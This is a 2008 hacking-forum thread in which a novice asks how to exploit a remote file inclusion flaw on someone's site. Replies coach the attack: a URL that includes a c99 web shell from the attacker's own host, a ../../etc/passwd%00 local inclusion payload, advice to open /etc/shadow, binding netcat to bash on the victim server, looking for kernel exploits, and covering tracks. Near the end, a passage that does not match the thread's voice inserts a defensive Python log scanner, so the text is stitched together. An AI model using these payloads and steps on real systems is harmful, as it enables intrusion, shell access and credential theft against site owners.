Waraxe IT Security Portal
noobish post. :D
Posted: Tue Aug 05, 2008 10:40 am
sol1dzer0
Regular user
Joined: Jan 21, 2008
Posts: 24

So I have some questions..

1. First one is about RFI. If I have found an RFI vuln site [at least I think so], what should I do next?!

I have made a host and uploaded c99 to it.. and did something like this..

www.vulnsyte.com/index.php?page=http://www.myhost.com/c99.php

but it seems nothing happens.. -.-' ! For RFI there are not many tuts that I have found -.- so I'm a total newB to this.. !

* What are the most common errors which lead to RFI?! It would be nice if you could show me examples like in SQL inj. ''You have an error in your SQL syntax''

* What is the usual next step on RFI?! Always upload some shell / script or something?! I don't kinda get it.. ;/

* What should I know to understand RFI better? 0_o Maybe someone has some good tutorials about this?! [What I know is I need to know all about the victim, ex. what OS is running, is there PHP, HTML or FP running etc.]

2. Rooting.. hmm yea.. total 0 for me.. would be nice if I get a redir. to some good tutorial.. something like Rooting for n00bs !! What it is, what can I do with it.. ex.

So I hope I get some help with this.. !

Thank you.
Posted: Tue Aug 05, 2008 11:09 am
lenny
Valuable expert
Joined: May 15, 2008
Posts: 275

Well, are you sure the page is vulnerable to RFI? index.php may have a set of filters to strip out the ":" of "http://", or in fact any URL altogether. Their host may also be set up to disable URL based includes (which is quite common). I believe that URL based includes are OFF in php.ini by default. Those could be your two main problems with your attack currently!

If you do manage to get an include, be sure to upload a shell - just keep it simple. Don't leave files on their server that are unnecessary, or you will arouse their suspicions. My usual approach (strictly lab based attacks, and for pen testing) is to start a netcat instance on their server forwarding to bash - essentially it allows me shell access in a more convenient environment than through a PHP script! From your makeshift SSH server, you can get to work looking at other exploits, for example in the kernel. Be sure to cover your tracks!

I suppose all that is pretty confusing, so ask away your questions - I'm here all week
Posted: Tue Aug 05, 2008 11:58 am
oniric
Advanced user
Joined: Jul 24, 2008
Posts: 65

A rooting paper would be useful for me too ^_^

Probably PHP is configured to not allow remote file inclusion through HTTP or other net protocols. It's very very common nowadays, like lenny said. Such vulns come from code like this:

include "../my/path/.".$_GET['page'].".php";

In such situations you could exploit this to load files that are outside the htdocs folder of the webserver. And you can load files with other extensions besides .php, which is automatically added by the code, by adding a NULL byte to your request like so:

http://vulnsite.com/index.php?page=../../etc/passwd%00

That's only an example; you also probably need to urlencode slashes. Please note the use of ../ to traverse the file system backward.

Yes, it's better if you know the victim OS so you can easily locate files on the file system. Just play with paths and directory traversal looking for known file locations like /etc/passwd on Linux systems. When you have such information you can start harvesting other useful information from other files, and maybe, if the server is running as root, opening the /etc/shadow file
Posted: Tue Aug 05, 2008 12:43 pm
sol1dzer0
Regular user
Joined: Jan 21, 2008
Posts: 24

Thank you guys, hmm a bit hard to understand this but I will try to learn ;] This is not as easy as SQL injection lol, but I thought the same about SQL injection when I didn't know anything.. ;] ! Thanks in advance.. if you two or anybody have something more to say, please reply ;]

more info = better success
Posted: Tue Aug 05, 2008 1:06 pm
oniric
Advanced user
Joined: Jul 24, 2008
Posts: 65

Mmm, I think SQLi is far more difficult ^_^ You need to know SQL, not always but in many cases.

One thing more: the NULL byte, %00, works because it's the urlencoded version of \0, the C/C++ NULL byte, also known as the string terminator. So if the string sequence is

mystring%00isasd

PHP would "see" only mystring.
Posted: Tue Aug 05, 2008 1:13 pm
sol1dzer0
Regular user
Joined: Jan 21, 2008
Posts: 24

oniric wrote:
Mmm, I think SQLi is far more difficult ^_^ You need to know SQL, not always but in many cases.

One thing more: the NULL byte, %00, works because it's the urlencoded version of \0, the C/C++ NULL byte, also known as the string terminator. So if the string sequence is

mystring%00isasd

PHP would "see" only mystring.

No, SQL inj is much easier than this ;] ! I can PM good tuts on it if you need them xDD !! ;] %00 ok, will keep that in mind
Posted: Tue Aug 05, 2008 1:18 pm
oniric
Advanced user
Joined: Jul 24, 2008
Posts: 65

Ah no, thx, SQLi is my field ^_^ I really like it, and exploiting it is such fun
Posted: Tue Aug 05, 2008 1:23 pm
lenny
Valuable expert
Joined: May 15, 2008
Posts: 275

I try and stay away from SQL injection. I really dislike it! I prefer something more solid, and that includes social engineering! It is a valid form of hacking, and it has served me well (and solidly) on many occasions!

Anyway, do you need any more information? Or should that suffice for now? Keep us informed, we can always help out if you need further assistance!
Posted: Tue Aug 05, 2008 2:02 pm
sol1dzer0
Regular user
Joined: Jan 21, 2008
Posts: 24

Yea, somebody likes SQL and somebody dislikes it ! ;]

And about RFI, right now it's ok, I will try to read some more stuff and learn more ;] ! Maybe someone in IRC will help me ;D
Btw I cannot connect to this site's IRC channel.. plugin missing and I cannot download it.. -.-' damn.. wanted to talk with you guys !!

Anyway thank you all !! You are kind ppl !
Posted: Tue Aug 05, 2008 2:15 pm
oniric
Advanced user
Joined: Jul 24, 2008
Posts: 65

Or LFI, more common. Probably your best bet, as lenny and I said, RFI in PHP is no longer so common. There's a setting in php.ini, called allow_url_fopen, that's commonly set to Off. And also if the code is like

include "somethinghere".$_GET['page'];

you can't overwrite the somethinghere part, so you can't call external http files in such a case (very common).
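From the defender's side, the three things lenny and oniric describe above (a remote URL in the include parameter, ../ traversal, and a %00 null byte cutting off an appended .php suffix) are all visible in the web server's access log. This is an added example, not code from any of the posters: a small Python scanner over constructed Apache-style log lines, two of which reuse the exact request paths quoted in the thread; the parameter names other than page and the 192.0.2.x client addresses are assumptions.

```python
"""Flag include-parameter abuse in Apache-style access logs (added example, not from the thread)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Query parameters the hypothetical application feeds into include().
INCLUDE_PARAMS = {"page", "file", "include"}
REMOTE_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)          # http://, ftp://, ...
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")                    # a ".." path segment
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed log lines; lines 2 and 3 carry the request paths quoted in the posts above.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2008:10:40:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [05/Aug/2008:10:40:02 +0000] "GET /index.php?page=http://www.myhost.com/c99.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [05/Aug/2008:10:40:03 +0000] "GET /index.php?page=../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [05/Aug/2008:10:40:04 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

def classify_value(value: str) -> list[str]:
    """Return the indicator names found in one raw parameter value."""
    # Decode twice so double-encoded traversal (%252e%252e%252f) is caught as well.
    decoded = unquote(unquote(value))
    findings = []
    if "\x00" in decoded:
        findings.append("null-byte")     # truncates a suffix such as ".php" that the code appends
    if TRAVERSAL.search(decoded):
        findings.append("traversal")     # ../ walks out of the intended include directory
    if REMOTE_SCHEME.match(decoded):
        findings.append("remote-url")    # only succeeds when URL includes are enabled in php.ini
    return findings

def scan_line(line: str) -> dict[str, list[str]]:
    """Map each suspicious include parameter in one log line to its indicators."""
    m = REQUEST.search(line)
    if not m:
        return {}
    hits = {}
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        if name in INCLUDE_PARAMS:
            found = classify_value(value)
            if found:
                hits[name] = found
    return hits

def scan_log(lines: list[str]) -> list[tuple[str, dict[str, list[str]]]]:
    """Return (client IP, findings) for every line carrying at least one indicator."""
    return [(ln.split(" ", 1)[0], hits) for ln in lines if (hits := scan_line(ln))]

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

A null byte or traversal in an include parameter is worth alerting on even when the request returned 200, since with the fixed-prefix include shown in the thread nothing in the response says which file was read.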
All times are GMT
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"